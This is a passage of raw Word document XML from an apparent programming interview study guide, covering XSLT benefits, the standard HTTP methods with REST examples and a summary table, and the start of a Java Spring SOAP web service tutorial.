          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It allows you to transform XML data into various output formats, such as HTML, text, or another XML structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193C6F7E"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concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Helps separate the XML data from the display logic, making it easier to maintain and update both.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8DF058"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werful Querying</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: XSLT uses XPath for powerful querying and transformation of XML data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664A22F4"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Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The same XML data can be reused with different XSLT stylesheets for different purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452BD3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84" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07836923" w14:textId="05B84D5D" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="002E1D1C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="420" w:name="_Toc197867634"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the action types of http</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="420"/>
    </w:p>
    <w:p w14:paraId="1CB8A62E" w14:textId="62DDA9E4" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C1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HTTP (HyperText Transfer Protocol) defines several </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>action types</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that indicate the desired action to be performed on a specific resource. These methods are also referred to as </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP verbs</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here are the most commonly used HTTP action types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CBF7DE"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GET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F0F297"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Retrieves data from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579756E8"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requests will yield the same result).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EDEA21"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 (it does not modify the server's state).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393BEAC0"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Fetching a web page or requesting data from an API endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA99DC4" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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ET /api/products (fetch a list of products).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6816561F"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POST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF2CF0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ubmits data to the server for processing, often resulting in a change in the server’s state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFC6135"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OST requests may have different effects).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292A1428"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can modify the server's state, such as creating a resource).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E541D9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Submitting a form, creating a new resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFF381E" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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OST /api/products (create a new product).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59189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PUT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0E04B4"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Updates an existing resource with the data sent in the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D72728"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PUT requests will yield the same result).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14062B76"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4BBE0025"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the details of an existing product.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531860B5" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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UT /api/products/123 (update the product with ID 123).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6942F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DELETE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B2FF13"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letes a resource on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F059A4"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deleting a resource multiple times results in the same outcome — the resource is no longer present).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ABA4F8"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server’s state by removing a resource).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E4A75F"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Deleting a product.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F5A2DB" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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pi/products/123 (delete the product with ID 123).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B75800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PATCH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BC7509"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artially updates a resource. Unlike PUT, which replaces the entire resource, PATCH only updates the specified fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E2CFF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ATCH requests can modify the resource differently each time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D51B7B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23028230"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only a specific field of a product, like changing the price.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32492B94" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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TCH /api/products/123 (update only the price of the product with ID 123).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1992D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6. HEAD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C227C1F"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imilar to GET, but it only retrieves the headers, not the body of the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12009871"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3BE4DF19"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564F96D3"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if a resource exists or retrieving metadata without downloading the resource itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465A0733" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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AD /api/products/123 (check if the product exists and get metadata).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D3149C"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7. OPTIONS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACA596B"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scribes the communication options for the target resource. It allows the client to discover which HTTP methods are supported by the server for a specific resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD55947"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66CED8E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2864D7B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Asking the server which methods are supported for a given resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB526C2" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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OPTIONS /api/products (find out which HTTP methods are allowed for /api/products).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239CA3B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8. CONNECT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B406E27"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Establishes a tunnel to the server, typically used for SSL/TLS encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CEB87F"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Idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: No.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728889F2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B20F064"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stablishing a secure connection through an HTTP proxy for encrypted traffic (typically used with HTTPS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B3174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9. TRACE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268FD3E2"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erforms a diagnostic trace of the request-response chain. The server returns the exact request that it received, useful for debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C05293"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4B2CCA90"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1063C537"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for intermediate changes in the request as it travels to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E918CB8" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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RACE /api/products/123 (trace the request-response path for the product with ID 123).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D06276" w14:textId="77777777" w:rsidR="008D1C1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89C7F">
          <v:rect id="_x0000_i1985" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="255E06C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032"/>
        <w:gridCol w:w="1145"/>
        <w:gridCol w:w="468"/>
      </w:tblGrid>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="26086657" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23361BAB"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TTP Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DD024C4"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="651F758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Idempotent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02EBAAE9"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afe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="5B7754EE" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B4AEC3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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7454542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data from the server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="622CCD55"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6BCE113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1530C30B" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C02024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ST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="441F4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bmit data to create or modify resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FFFD31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14517C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45693451" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AB747C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T</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34495B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place or update a resource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D4494D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4B10250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55FDEC68" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7008D8CC"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LETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E71E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 resource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13C3E1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CB63A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42B1E27" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="096338B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CH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E844DC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rtially update a resource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74A9929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2869213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F2D136A" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6530B7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HEAD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19043FB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headers (no body)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="530C583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1BA049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302AEB08" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F4EB44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OPTIONS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="796701D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scribe available methods for a resource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FBEDDE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8542C0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4828052C" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7987527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NNECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57749BA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stablish a tunnel for secure communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F83C3C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6CF9D9D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0204B105" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="425B35A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CE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4025811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erform a diagnostic trace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79D5FEC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219C3E0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bl>
    <w:p w14:paraId="0907C6D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action types provide the basic operations that can be performed on resources through HTTP in a RESTful service or web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D12A772" w14:textId="4F53BF1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86" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5CE2CA" w14:textId="78FD0EB5" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="004876C2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="421" w:name="_Toc197867635"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain how you will create a </w:t>
      </w:r>
      <w:r w:rsidR="00F81212" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>SOAP web service</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="421"/>
    </w:p>
    <w:p w14:paraId="0D18E344" w14:textId="25D55919" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To create a SOAP web service, you will follow these general steps. Below is an example using </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Web Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, though the process can be adapted for other technologies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED34D05"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Steps to Create a SOAP Web Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3E7DD3"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1. Set Up Your Development Environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076DECA9" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1811"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use a Java IDE (such as IntelliJ IDEA or Eclipse) and ensure you have the following tools installed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1CBD2E"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JDK (Java Development Kit) 8 or later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C924084"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Maven or Gradle for dependency management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C1C147"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Apache Tomcat or any compatible servlet container for hosting your service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0120728D"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Spring Web Services (for SOAP service creation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D72FB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2. Create a Maven/Gradle Project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4E5B8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f using Maven, create a pom.xml file with the necessary dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1B73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Maven dependencies (pom.xml)</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1BE42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580D2E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CB02A3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5D4F71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webservices&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB270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17985C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4B1BF6E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ADC190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38B991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web&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FD0E0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40F4E7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7A42596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5E6E039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logging&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C92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54EC294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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F7F9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7E3A275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xml&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
